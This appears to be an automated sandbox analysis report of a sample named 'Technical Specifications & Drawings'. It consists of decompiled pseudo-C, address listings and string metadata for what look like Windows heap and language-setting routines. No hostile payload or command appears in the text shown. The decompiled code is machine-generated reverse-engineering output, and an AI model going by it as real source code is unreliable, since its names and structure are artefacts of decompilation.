                                                  								E017CB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                  								E017CA830(_t553, _v64, _v24);
                                                  								_t286 = E017C7D50();
                                                  								_t542 = 0x7ffe0380;
                                                  								__eflags = _t286;
                                                  								if(_t286 != 0) {
                                                  									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  								} else {
                                                  									_t289 = 0x7ffe0380;
                                                  								}
                                                  								__eflags =  *_t289;
                                                  								if( *_t289 != 0) {
                                                  									_t290 =  *[fs:0x30];
                                                  									__eflags =  *(_t290 + 0x240) & 1;
                                                  									if(( *(_t290 + 0x240) & 1) != 0) {
                                                  										__eflags = E017C7D50();
                                                  										if(__eflags != 0) {
                                                  											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  										}
                                                  										E01861411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                  									}
                                                  								}
                                                  								_t291 = E017C7D50();
                                                  								_t543 = 0x7ffe038a;
                                                  								__eflags = _t291;
                                                  								if(_t291 != 0) {
                                                  									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                  								} else {
                                                  									_t246 = 0x7ffe038a;
                                                  								}
                                                  								__eflags =  *_t246;
                                                  								if( *_t246 != 0) {
                                                  									__eflags = E017C7D50();
                                                  									if(__eflags != 0) {
                                                  										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                  										__eflags = _t543;
                                                  									}
                                                  									_push( *_t543 & 0x000000ff);
                                                  									_push(_t446);
                                                  									_push(_t446);
                                                  									L120:
                                                  									_push( *(_t553 + 0x74) << 3);
                                                  									_push(_v52);
                                                  									_t246 = E01861411(_t446, _t553, _v44, __eflags);
                                                  								}
                                                  								goto L7;
                                                  							}
                                                  							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                  							_t339 = E017D174B( &_v44,  &_v52, 0x4000);
                                                  							__eflags = _t339;
                                                  							if(_t339 < 0) {
                                                  								L94:
                                                  								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                  								__eflags = _v40;
                                                  								if(_v40 == 0) {
                                                  									goto L153;
                                                  								}
                                                  								E017CB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                  								goto L152;
                                                  							}
                                                  							_t344 = E017C7D50();
                                                  							__eflags = _t344;
                                                  							if(_t344 != 0) {
                                                  								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  							} else {
                                                  								_t347 = 0x7ffe0380;
                                                  							}
                                                  							__eflags =  *_t347;
                                                  							if( *_t347 != 0) {
                                                  								_t348 =  *[fs:0x30];
                                                  								__eflags =  *(_t348 + 0x240) & 1;
                                                  								if(( *(_t348 + 0x240) & 1) != 0) {
                                                  									E018614FB(_t445, _t553, _v44, _v52, 6);
                                                  								}
                                                  							}
                                                  							_t513 = _v48;
                                                  							goto L33;
                                                  						}
                                                  						__eflags =  *_v12 - 3;
                                                  						_t513 = _v48;
                                                  						if( *_v12 == 3) {
                                                  							goto L27;
                                                  						}
                                                  						__eflags = _t460;
                                                  						if(_t460 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                  						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                  							goto L9;
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  				}
                                                  				_t445 = _a4;
                                                  				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                  					_t513 = __edx;
                                                  					goto L10;
                                                  				}
                                                  				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                  				_v20 = _t433;
                                                  				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                  					_t513 = _t539;
                                                  					goto L9;
                                                  				} else {
                                                  					_t437 = E017C99BF(__ecx, __edx,  &_a4, 0);
                                                  					_t445 = _a4;
                                                  					_t514 = _t437;
                                                  					_v56 = _t514;
                                                  					if(_t445 - 0x201 > 0xfbff) {
                                                  						goto L14;
                                                  					} else {
                                                  						E017CA830(__ecx, _t514, _t445);
                                                  						_t506 =  *(_t553 + 0x238);
                                                  						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                  						_t246 = _t506 >> 4;
                                                  						if(_t551 < _t506 - _t246) {
                                                  							_t508 =  *(_t553 + 0x23c);
                                                  							_t246 = _t508 >> 2;
                                                  							__eflags = _t551 - _t508 - _t246;
                                                  							if(_t551 > _t508 - _t246) {
                                                  								_t246 = E017DABD8(_t553);
                                                  								 *(_t553 + 0x23c) = _t551;
                                                  								 *(_t553 + 0x238) = _t551;
                                                  							}
                                                  						}
                                                  						goto L7;
                                                  					}
                                                  				}
                                                  			}



















































































                                                  0x017ca358
                                                  0x017ca3c6
                                                  0x00000000
                                                  0x017ca371
                                                  0x017ca37a
                                                  0x017ca37f
                                                  0x017ca382
                                                  0x017ca384
                                                  0x017ca394
                                                  0x00000000
                                                  0x017ca396
                                                  0x017ca399
                                                  0x017ca3a7
                                                  0x017ca3b0
                                                  0x017ca3b4
                                                  0x017ca3bb
                                                  0x017ca3d2
                                                  0x017ca3da
                                                  0x017ca3df
                                                  0x017ca3e1
                                                  0x017ca3e5
                                                  0x017ca3ea
                                                  0x017ca3f0
                                                  0x017ca3f0
                                                  0x017ca3e1
                                                  0x00000000
                                                  0x017ca3bb
                                                  0x017ca394

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: 81fa5ae3ca4b4a7ad752bde6c42691d5c35ca7e5a930923ea81b5c0c4d3f3a25
                                                  • Instruction ID: ee1d9e94303b15b2e6cfb706220f3a288effa619e921828164af16b0b1d496ce
                                                  • Opcode Fuzzy Hash: 81fa5ae3ca4b4a7ad752bde6c42691d5c35ca7e5a930923ea81b5c0c4d3f3a25
                                                  • Instruction Fuzzy Hash: 4B42FF316047469FC715CF38C488A2AFBE6BF94B04F18496DE586CB356E734DA81CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E017B3D34(signed int* __ecx) {
                                                  				signed int* _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				signed int* _v20;
                                                  				char _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				char _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int* _v48;
                                                  				signed int* _v52;
                                                  				signed int _v56;
                                                  				signed int _v60;
                                                  				char _v68;
                                                  				signed int _t140;
                                                  				signed int _t161;
                                                  				signed int* _t236;
                                                  				signed int* _t242;
                                                  				signed int* _t243;
                                                  				signed int* _t244;
                                                  				signed int* _t245;
                                                  				signed int _t255;
                                                  				void* _t257;
                                                  				signed int _t260;
                                                  				void* _t262;
                                                  				signed int _t264;
                                                  				void* _t267;
                                                  				signed int _t275;
                                                  				signed int* _t276;
                                                  				short* _t277;
                                                  				signed int* _t278;
                                                  				signed int* _t279;
                                                  				signed int* _t280;
                                                  				short* _t281;
                                                  				signed int* _t282;
                                                  				short* _t283;
                                                  				signed int* _t284;
                                                  				void* _t285;
                                                  
                                                  				_v60 = _v60 | 0xffffffff;
                                                  				_t280 = 0;
                                                  				_t242 = __ecx;
                                                  				_v52 = __ecx;
                                                  				_v8 = 0;
                                                  				_v20 = 0;
                                                  				_v40 = 0;
                                                  				_v28 = 0;
                                                  				_v32 = 0;
                                                  				_v44 = 0;
                                                  				_v56 = 0;
                                                  				_t275 = 0;
                                                  				_v16 = 0;
                                                  				if(__ecx == 0) {
                                                  					_t280 = 0xc000000d;
                                                  					_t140 = 0;
                                                  					L50:
                                                  					 *_t242 =  *_t242 | 0x00000800;
                                                  					_t242[0x13] = _t140;
                                                  					_t242[0x16] = _v40;
                                                  					_t242[0x18] = _v28;
                                                  					_t242[0x14] = _v32;
                                                  					_t242[0x17] = _t275;
                                                  					_t242[0x15] = _v44;
                                                  					_t242[0x11] = _v56;
                                                  					_t242[0x12] = _v60;
                                                  					return _t280;
                                                  				}
                                                  				if(E017B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                  					_v56 = 1;
                                                  					if(_v8 != 0) {
                                                  						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                  					}
                                                  					_v8 = _t280;
                                                  				}
                                                  				if(E017B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                  					_v60 =  *_v8;
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                  					_v8 = _t280;
                                                  				}
                                                  				if(E017B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                  					L16:
                                                  					if(E017B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                  						L28:
                                                  						if(E017B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                  							L46:
                                                  							_t275 = _v16;
                                                  							L47:
                                                  							_t161 = 0;
                                                  							L48:
                                                  							if(_v8 != 0) {
                                                  								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                  							}
                                                  							_t140 = _v20;
                                                  							if(_t140 != 0) {
                                                  								if(_t275 != 0) {
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                  									_t275 = 0;
                                                  									_v28 = 0;
                                                  									_t140 = _v20;
                                                  								}
                                                  							}
                                                  							goto L50;
                                                  						}
                                                  						_t167 = _v12;
                                                  						_t255 = _v12 + 4;
                                                  						_v44 = _t255;
                                                  						if(_t255 == 0) {
                                                  							_t276 = _t280;
                                                  							_v32 = _t280;
                                                  						} else {
                                                  							_t276 = L017C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                  							_t167 = _v12;
                                                  							_v32 = _t276;
                                                  						}
                                                  						if(_t276 == 0) {
                                                  							_v44 = _t280;
                                                  							_t280 = 0xc0000017;
                                                  							goto L46;
                                                  						} else {
                                                  							E017EF3E0(_t276, _v8, _t167);
                                                  							_v48 = _t276;
                                                  							_t277 = E017F1370(_t276, 0x1784e90);
                                                  							_pop(_t257);
                                                  							if(_t277 == 0) {
                                                  								L38:
                                                  								_t170 = _v48;
                                                  								if( *_v48 != 0) {
                                                  									E017EBB40(0,  &_v68, _t170);
                                                  									if(L017B43C0( &_v68,  &_v24) != 0) {
                                                  										_t280 =  &(_t280[0]);
                                                  									}
                                                  								}
                                                  								if(_t280 == 0) {
                                                  									_t280 = 0;
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                  									_v44 = 0;
                                                  									_v32 = 0;
                                                  								} else {
                                                  									_t280 = 0;
                                                  								}
                                                  								_t174 = _v8;
                                                  								if(_v8 != 0) {
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                  								}
                                                  								_v8 = _t280;
                                                  								goto L46;
                                                  							}
                                                  							_t243 = _v48;
                                                  							do {
                                                  								 *_t277 = 0;
                                                  								_t278 = _t277 + 2;
                                                  								E017EBB40(_t257,  &_v68, _t243);
                                                  								if(L017B43C0( &_v68,  &_v24) != 0) {
                                                  									_t280 =  &(_t280[0]);
                                                  								}
                                                  								_t243 = _t278;
                                                  								_t277 = E017F1370(_t278, 0x1784e90);
                                                  								_pop(_t257);
                                                  							} while (_t277 != 0);
                                                  							_v48 = _t243;
                                                  							_t242 = _v52;
                                                  							goto L38;
                                                  						}
                                                  					}
                                                  					_t191 = _v12;
                                                  					_t260 = _v12 + 4;
                                                  					_v28 = _t260;
                                                  					if(_t260 == 0) {
                                                  						_t275 = _t280;
                                                  						_v16 = _t280;
                                                  					} else {
                                                  						_t275 = L017C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                  						_t191 = _v12;
                                                  						_v16 = _t275;
                                                  					}
                                                  					if(_t275 == 0) {
                                                  						_v28 = _t280;
                                                  						_t280 = 0xc0000017;
                                                  						goto L47;
                                                  					} else {
                                                  						E017EF3E0(_t275, _v8, _t191);
                                                  						_t285 = _t285 + 0xc;
                                                  						_v48 = _t275;
                                                  						_t279 = _t280;
                                                  						_t281 = E017F1370(_v16, 0x1784e90);
                                                  						_pop(_t262);
                                                  						if(_t281 != 0) {
                                                  							_t244 = _v48;
                                                  							do {
                                                  								 *_t281 = 0;
                                                  								_t282 = _t281 + 2;
                                                  								E017EBB40(_t262,  &_v68, _t244);
                                                  								if(L017B43C0( &_v68,  &_v24) != 0) {
                                                  									_t279 =  &(_t279[0]);
                                                  								}
                                                  								_t244 = _t282;
                                                  								_t281 = E017F1370(_t282, 0x1784e90);
                                                  								_pop(_t262);
                                                  							} while (_t281 != 0);
                                                  							_v48 = _t244;
                                                  							_t242 = _v52;
                                                  						}
                                                  						_t201 = _v48;
                                                  						_t280 = 0;
                                                  						if( *_v48 != 0) {
                                                  							E017EBB40(_t262,  &_v68, _t201);
                                                  							if(L017B43C0( &_v68,  &_v24) != 0) {
                                                  								_t279 =  &(_t279[0]);
                                                  							}
                                                  						}
                                                  						if(_t279 == 0) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                  							_v28 = _t280;
                                                  							_v16 = _t280;
                                                  						}
                                                  						_t202 = _v8;
                                                  						if(_v8 != 0) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                  						}
                                                  						_v8 = _t280;
                                                  						goto L28;
                                                  					}
                                                  				}
                                                  				_t214 = _v12;
                                                  				_t264 = _v12 + 4;
                                                  				_v40 = _t264;
                                                  				if(_t264 == 0) {
                                                  					_v20 = _t280;
                                                  				} else {
                                                  					_t236 = L017C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                  					_t280 = _t236;
                                                  					_v20 = _t236;
                                                  					_t214 = _v12;
                                                  				}
                                                  				if(_t280 == 0) {
                                                  					_t161 = 0;
                                                  					_t280 = 0xc0000017;
                                                  					_v40 = 0;
                                                  					goto L48;
                                                  				} else {
                                                  					E017EF3E0(_t280, _v8, _t214);
                                                  					_t285 = _t285 + 0xc;
                                                  					_v48 = _t280;
                                                  					_t283 = E017F1370(_t280, 0x1784e90);
                                                  					_pop(_t267);
                                                  					if(_t283 != 0) {
                                                  						_t245 = _v48;
                                                  						do {
                                                  							 *_t283 = 0;
                                                  							_t284 = _t283 + 2;
                                                  							E017EBB40(_t267,  &_v68, _t245);
                                                  							if(L017B43C0( &_v68,  &_v24) != 0) {
                                                  								_t275 = _t275 + 1;
                                                  							}
                                                  							_t245 = _t284;
                                                  							_t283 = E017F1370(_t284, 0x1784e90);
                                                  							_pop(_t267);
                                                  						} while (_t283 != 0);
                                                  						_v48 = _t245;
                                                  						_t242 = _v52;
                                                  					}
                                                  					_t224 = _v48;
                                                  					_t280 = 0;
                                                  					if( *_v48 != 0) {
                                                  						E017EBB40(_t267,  &_v68, _t224);
                                                  						if(L017B43C0( &_v68,  &_v24) != 0) {
                                                  							_t275 = _t275 + 1;
                                                  						}
                                                  					}
                                                  					if(_t275 == 0) {
                                                  						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                  						_v40 = _t280;
                                                  						_v20 = _t280;
                                                  					}
                                                  					_t225 = _v8;
                                                  					if(_v8 != 0) {
                                                  						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                  					}
                                                  					_v8 = _t280;
                                                  					goto L16;
                                                  				}
                                                  			}










































                                                  0x017b401e
                                                  0x00000000
                                                  0x017b401e
                                                  0x017b3fb6
                                                  0x017b3eb1
                                                  0x017b3eb4
                                                  0x017b3eb7
                                                  0x017b3ebc
                                                  0x018082a9
                                                  0x018082ab
                                                  0x017b3ec2
                                                  0x017b3ed3
                                                  0x017b3ed5
                                                  0x017b3ed8
                                                  0x017b3ed8
                                                  0x017b3edd
                                                  0x018082b3
                                                  0x018082b6
                                                  0x00000000
                                                  0x017b3ee3
                                                  0x017b3ee8
                                                  0x017b3eed
                                                  0x017b3ef0
                                                  0x017b3ef3
                                                  0x017b3f02
                                                  0x017b3f05
                                                  0x017b3f08
                                                  0x018082c0
                                                  0x018082c3
                                                  0x018082c5
                                                  0x018082c8
                                                  0x018082d0
                                                  0x018082e4
                                                  0x018082e6
                                                  0x018082e6
                                                  0x018082ed
                                                  0x018082f4
                                                  0x018082f7
                                                  0x018082f8
                                                  0x018082fc
                                                  0x018082ff
                                                  0x018082ff
                                                  0x017b3f0e
                                                  0x017b3f11
                                                  0x017b3f16
                                                  0x017b3f1d
                                                  0x017b3f31
                                                  0x01808307
                                                  0x01808307
                                                  0x017b3f31
                                                  0x017b3f39
                                                  0x017b3f48
                                                  0x017b3f4d
                                                  0x017b3f50
                                                  0x017b3f50
                                                  0x017b3f53
                                                  0x017b3f58
                                                  0x017b3f65
                                                  0x017b3f65
                                                  0x017b3f6a
                                                  0x00000000
                                                  0x017b3f6a
                                                  0x017b3edd
                                                  0x017b3dda
                                                  0x017b3ddd
                                                  0x017b3de0
                                                  0x017b3de5
                                                  0x01808245
                                                  0x017b3deb
                                                  0x017b3df7
                                                  0x017b3dfc
                                                  0x017b3dfe
                                                  0x017b3e01
                                                  0x017b3e01
                                                  0x017b3e06
                                                  0x0180824d
                                                  0x0180824f
                                                  0x01808254
                                                  0x00000000
                                                  0x017b3e0c
                                                  0x017b3e11
                                                  0x017b3e16
                                                  0x017b3e19
                                                  0x017b3e29
                                                  0x017b3e2c
                                                  0x017b3e2f
                                                  0x0180825c
                                                  0x0180825f
                                                  0x01808261
                                                  0x01808264
                                                  0x0180826c
                                                  0x01808280
                                                  0x01808282
                                                  0x01808282
                                                  0x01808289
                                                  0x01808290
                                                  0x01808293
                                                  0x01808294
                                                  0x01808298
                                                  0x0180829b
                                                  0x0180829b
                                                  0x017b3e35
                                                  0x017b3e38
                                                  0x017b3e3d
                                                  0x017b3e44
                                                  0x017b3e58
                                                  0x018082a3
                                                  0x018082a3
                                                  0x017b3e58
                                                  0x017b3e60
                                                  0x017b3e6f
                                                  0x017b3e74
                                                  0x017b3e77
                                                  0x017b3e77
                                                  0x017b3e7a
                                                  0x017b3e7f
                                                  0x017b3e8c
                                                  0x017b3e8c
                                                  0x017b3e91
                                                  0x00000000
                                                  0x017b3e91

                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 017B3F70
                                                  • Kernel-MUI-Language-Allowed, xrefs: 017B3DC0
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 017B3E97
                                                  • Kernel-MUI-Number-Allowed, xrefs: 017B3D8C
                                                  • WindowsExcludedProcs, xrefs: 017B3D6F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                  • Instruction ID: 3b92f503e57748ffa12f842f2f7dcd8e3ab7dcacc42253aa20eb634e721e3525
                                                  • Opcode Fuzzy Hash: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                  • Instruction Fuzzy Hash: 86F12772D00219EBCB12DF98C984AEEFBB9FF59750F15006AE506E7251E7749A40CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E0187E824(signed int __ecx, signed int* __edx) {
                                                  				signed int _v8;
                                                  				signed char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				unsigned int _v44;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t177;
                                                  				signed int _t179;
                                                  				unsigned int _t202;
                                                  				signed char _t207;
                                                  				signed char _t210;
                                                  				signed int _t230;
                                                  				void* _t244;
                                                  				unsigned int _t247;
                                                  				signed int _t288;
                                                  				signed int _t289;
                                                  				signed int _t291;
                                                  				signed char _t293;
                                                  				signed char _t295;
                                                  				signed char _t298;
                                                  				intOrPtr* _t303;
                                                  				signed int _t310;
                                                  				signed char _t316;
                                                  				signed int _t319;
                                                  				signed char _t323;
                                                  				signed char _t330;
                                                  				signed int _t334;
                                                  				signed int _t337;
                                                  				signed int _t341;
                                                  				signed char _t345;
                                                  				signed char _t347;
                                                  				signed int _t353;
                                                  				signed char _t354;
                                                  				void* _t383;
                                                  				signed char _t385;
                                                  				signed char _t386;
                                                  				unsigned int _t392;
                                                  				signed int _t393;
                                                  				signed int _t395;
                                                  				signed int _t398;
                                                  				signed int _t399;
                                                  				signed int _t401;
                                                  				unsigned int _t403;
                                                  				void* _t404;
                                                  				unsigned int _t405;
                                                  				signed int _t406;
                                                  				signed char _t412;
                                                  				unsigned int _t413;
                                                  				unsigned int _t418;
                                                  				void* _t419;
                                                  				void* _t420;
                                                  				void* _t421;
                                                  				void* _t422;
                                                  				void* _t423;
                                                  				signed char* _t425;
                                                  				signed int _t426;
                                                  				signed int _t428;
                                                  				unsigned int _t430;
                                                  				signed int _t431;
                                                  				signed int _t433;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t433;
                                                  				_v40 = __ecx;
                                                  				_v16 = __edx;
                                                  				_t289 = 0x4cb2f;
                                                  				_t425 = __edx[1];
                                                  				_t403 =  *__edx << 2;
                                                  				if(_t403 < 8) {
                                                  					L3:
                                                  					_t404 = _t403 - 1;
                                                  					if(_t404 == 0) {
                                                  						L16:
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						L17:
                                                  						_t426 = _v40;
                                                  						_v20 = _t426 + 0x1c;
                                                  						_t177 = L017CFAD0(_t426 + 0x1c);
                                                  						_t385 = 0;
                                                  						while(1) {
                                                  							L18:
                                                  							_t405 =  *(_t426 + 4);
                                                  							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                                                  							_t316 = _t289 & _t179;
                                                  							_v24 = _t179;
                                                  							_v32 = _t316;
                                                  							_v12 = _t316 >> 0x18;
                                                  							_v36 = _t316 >> 0x10;
                                                  							_v28 = _t316 >> 8;
                                                  							if(_t385 != 0) {
                                                  								goto L21;
                                                  							}
                                                  							_t418 = _t405 >> 5;
                                                  							if(_t418 == 0) {
                                                  								_t406 = 0;
                                                  								L31:
                                                  								if(_t406 == 0) {
                                                  									L35:
                                                  									E017CFA00(_t289, _t316, _t406, _t426 + 0x1c);
                                                  									 *0x189b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                                                  									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                                                  									_v36 = _t319;
                                                  									if(_t319 != 0) {
                                                  										asm("stosd");
                                                  										asm("stosd");
                                                  										asm("stosd");
                                                  										_t408 = _v16;
                                                  										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                                                  										 *((char*)(_t319 + 0xb)) =  *_v16;
                                                  										 *(_t319 + 4) = _t289;
                                                  										_t53 = _t319 + 0xc; // 0xc
                                                  										E017C2280(E017EF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                                                  										_t428 = _v40;
                                                  										_t386 = 0;
                                                  										while(1) {
                                                  											L38:
                                                  											_t202 =  *(_t428 + 4);
                                                  											_v16 = _v16 | 0xffffffff;
                                                  											_v16 = _v16 << (_t202 & 0x0000001f);
                                                  											_t323 = _v16 & _t289;
                                                  											_v20 = _t323;
                                                  											_v20 = _v20 >> 0x18;
                                                  											_v28 = _t323;
                                                  											_v28 = _v28 >> 0x10;
                                                  											_v12 = _t323;
                                                  											_v12 = _v12 >> 8;
                                                  											_v32 = _t323;
                                                  											if(_t386 != 0) {
                                                  												goto L41;
                                                  											}
                                                  											_t247 = _t202 >> 5;
                                                  											_v24 = _t247;
                                                  											if(_t247 == 0) {
                                                  												_t412 = 0;
                                                  												L50:
                                                  												if(_t412 == 0) {
                                                  													L53:
                                                  													_t291 =  *(_t428 + 4);
                                                  													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                                                  													_v44 =  *(_t428 + 0x24);
                                                  													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                                                  													_t207 = _t291 >> 5;
                                                  													if( *_t428 < _t207 + _t207) {
                                                  														L74:
                                                  														_t430 = _t291 >> 5;
                                                  														_t293 = _v36;
                                                  														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                                                  														_v44 = _t210;
                                                  														_t159 = _t430 - 1; // 0xffffffdf
                                                  														_t428 = _v40;
                                                  														_t330 =  *(_t428 + 8);
                                                  														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                  														_t412 = _t293;
                                                  														 *_t293 =  *(_t330 + _t386 * 4);
                                                  														 *(_t330 + _t386 * 4) = _t293;
                                                  														 *_t428 =  *_t428 + 1;
                                                  														_t289 = 0;
                                                  														L75:
                                                  														E017BFFB0(_t289, _t412, _t428 + 0x1c);
                                                  														if(_t289 != 0) {
                                                  															_t428 =  *(_t428 + 0x24);
                                                  															 *0x189b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                                                  															 *_t428();
                                                  														}
                                                  														L77:
                                                  														return E017EB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                                                  													}
                                                  													_t334 = 2;
                                                  													_t207 = E017DF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                                                  													if(_t207 < 0) {
                                                  														goto L74;
                                                  													}
                                                  													_t413 = _v24;
                                                  													if(_t413 < 4) {
                                                  														_t413 = 4;
                                                  													}
                                                  													 *0x189b1e0(_t413 << 2, _v28);
                                                  													_t207 =  *_v32();
                                                  													_t386 = _t207;
                                                  													_v16 = _t386;
                                                  													if(_t386 == 0) {
                                                  														_t291 =  *(_t428 + 4);
                                                  														if(_t291 >= 0x20) {
                                                  															goto L74;
                                                  														}
                                                  														_t289 = _v36;
                                                  														_t412 = 0;
                                                  														goto L75;
                                                  													} else {
                                                  														_t108 = _t413 - 1; // 0x3
                                                  														_t337 = _t108;
                                                  														if((_t413 & _t337) == 0) {
                                                  															L62:
                                                  															if(_t413 > 0x4000000) {
                                                  																_t413 = 0x4000000;
                                                  															}
                                                  															_t295 = _t386;
                                                  															_v24 = _v24 & 0x00000000;
                                                  															_t392 = _t413 << 2;
                                                  															_t230 = _t428 | 0x00000001;
                                                  															_t393 = _t392 >> 2;
                                                  															asm("sbb ecx, ecx");
                                                  															_t341 =  !(_v16 + _t392) & _t393;
                                                  															if(_t341 <= 0) {
                                                  																L67:
                                                  																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                                                  																_v32 = _t395;
                                                  																_v20 = 0;
                                                  																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                                                  																	L72:
                                                  																	_t345 =  *(_t428 + 8);
                                                  																	_t207 = _v16;
                                                  																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                                                  																	 *(_t428 + 8) = _t207;
                                                  																	 *(_t428 + 4) = _t291;
                                                  																	if(_t345 != 0) {
                                                  																		 *0x189b1e0(_t345, _v28);
                                                  																		_t207 =  *_v44();
                                                  																		_t291 =  *(_t428 + 4);
                                                  																	}
                                                  																	goto L74;
                                                  																} else {
                                                  																	goto L68;
                                                  																}
                                                  																do {
                                                  																	L68:
                                                  																	_t298 =  *(_t428 + 8);
                                                  																	_t431 = _v20;
                                                  																	_v12 = _t298;
